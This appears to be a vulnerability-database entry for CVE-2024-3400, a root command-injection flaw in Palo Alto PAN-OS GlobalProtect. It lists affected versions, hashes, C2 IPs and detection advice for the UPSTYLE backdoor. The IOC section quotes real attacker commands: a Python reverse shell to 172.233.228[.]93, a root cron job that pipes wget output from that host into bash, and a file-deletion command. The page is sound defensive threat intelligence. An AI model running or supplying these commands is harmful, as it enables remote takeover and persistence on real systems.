cbcvebase.
CVE-2024-3400
published 2024-04-12

CVE-2024-3400: A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS…

PriorityP1100critical10CVSS 3.1
AVNACLPRNUINSCCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2024-04-19
Exploited in the wild
EPSS
100.00%
100.0th percentile
A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.

Affected

24 ranges
VendorProductVersion rangeFixed in
palo_alto_networkspan-os>= 10.2.0 < 10.2.9-h110.2.9-h1
palo_alto_networkspan-os>= 11.0.0 < 11.0.4-h111.0.4-h1
palo_alto_networkspan-os>= 11.1.0 < 11.1.2-h311.1.2-h3
paloaltocloud_ngfw
paloaltopan-os
paloaltoprisma_access
paloaltonetworkspan-os
paloaltonetworkspan-os
paloaltonetworkspan-os
paloaltonetworkspan-os
paloaltonetworkspan-os
paloaltonetworkspan-os
paloaltonetworkspan-os
paloaltonetworkspan-os
paloaltonetworkspan-os
paloaltonetworkspan-os
paloaltonetworkspan-os
paloaltonetworkspan-os
paloaltonetworkspan-os
paloaltonetworkspan-os
paloaltonetworkspan-os
paloaltonetworkspan-os
paloaltonetworkspan-os
paloaltonetworkspan-os

Detection & IOCsextracted from sources · hover to see the quote

hash3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac
hash0c1554888ce9ed0da1583dbdf7b31651
hash988fc0d23e6e30c2c46ccec9bbff50b7453b8ba9
hash35a5f8ac03b0e3865b3177892420cb34233c55240f452f00f9004e274a85703c
hashd31ec83a5a79451a46e980ebffb6e0e8
hasha7c6f264b00d13808ceb76b3277ee5461ae1354e
hash755f5b8bd67d226f24329dc960f59e11cb5735b930b4ed30b2df77572efb32e8
hasha43e3cf908244f85b237fdbacd8d82d5
hashe1e427c9b46064e2b483f90b13490e6ef522cc06
hash5e4c623296125592256630deabdbf1d2
hashd12b614e9417c4916d5c5bb6ee42c487c937c058
hashadba167a9df482aa991faaa0e0cde1182fb9acfbb0dc8d19148ce634608bab87
hash87312a7173889a8a5258c68cac4817bd
hash3ad9be0c52510cbc5d1e184e0066d14c1f394d4d
hashc1a0d380bf55070496b9420b970dfc5c2c4ad0a598083b9077493e8b8035f1e9
hashab3b9ec7bdd2e65051076d396d0ce76c1b4d6f3f00807fa776017de88bebd2f3
hash949cfa6514e499e28aa32feba800181558e60455b971206aa5aa601ea1f55605
hash710f67d0561c659aecc56b94ee3fc82c967a9647c08451ed35ffa757020167fb
ip172.233.228.93
ip172.233.228.93
ip23.227.194.230
ip154.88.26.223
ip206.189.14.205
path/usr/lib/python3.6/site-packages/system.pth
path/var/log/pan/sslvpn_ngx_error.log
path/var/appweb/sslvpndocs/global-protect/portal/css/bootstrap.min.css
path/etc/cron.d/update
path/opt/pancfg/mgmt/saved-configs/running-config.xml
filenameupdate.py
filenamesystem.pth
commandpython -c "import sys,socket,os,pty;s=socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect(('172.233.228[.]93',443));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn('/bin/bash')"
commandprintf "SHELL=/bin/bash\n\n* * * * * root wget -qO- http://172.233.228[.]93/policy | bash\n\n" > /etc/cron.d/update
commandrm -f /var/appweb/sslvpndocs/global-protect/*.css
otherimg\[([a-zA-Z0-9+/=]+)\]
domainworldtimeapi.org
  • Monitor for creation or modification of /usr/lib/python3.6/site-packages/system.pth — the UPSTYLE backdoor installer drops this .pth file to achieve persistence via Python's path configuration mechanism.
  • Alert on unexpected writes to /var/appweb/sslvpndocs/global-protect/portal/css/bootstrap.min.css — UPSTYLE appends command output to this legitimate CSS file as its exfiltration channel.
  • Hunt for HTTP requests to the firewall containing the URI pattern img{base64-encoded-data} — UPSTYLE parses /var/log/pan/sslvpn_ngx_error.log for this pattern to extract and execute attacker commands.
  • Detect outbound connections from the GlobalProtect firewall to worldtimeapi.org — observed as attacker-controlled beacon traffic during post-exploitation.
  • Alert on SMB/WinRM lateral movement originating from the GlobalProtect firewall device IP — attackers pivoted internally using a domain admin service account after compromising the firewall.
  • Detect direct-to-IP HTTP requests (no hostname) from the firewall device for payload download — attackers used direct-to-IP HTTP to retrieve tools from C2.
  • Look for the process string 'import sys,socket,os' in running process list on PAN-OS devices — the reverse shell one-liner contains this distinctive string detectable via ps -ef.
  • Check for presence of /etc/cron.d/update on PAN-OS devices — the attacker's 'patch' script creates this cron job to periodically pull and execute a remote shell script.
  • Generate a Tech Support File from the PAN-OS device and analyze logs for forensic artifacts to detect compromise.
  • ·Cloud NGFW, Panorama appliances, and Prisma Access are explicitly NOT affected by CVE-2024-3400 — only specific on-prem PAN-OS versions with GlobalProtect enabled are vulnerable.
  • ·The UPSTYLE backdoor files (filenames and indicators) were altered by UTA0218 per victim — do not rely solely on static IOCs; behavioral detection is essential.
  • ·The C2 server at 172.233.228.93 enforced an IP-based access control list — it only responded to requests from the compromised firewall device, making external validation of the C2 from other IPs impossible.
  • ·Applying mitigations or patches will NOT remediate an existing compromise — affected organizations must separately investigate for breach.

CVSS provenance

nvdv3.110.0CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
vulncheck10.0CRITICAL
cisa10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.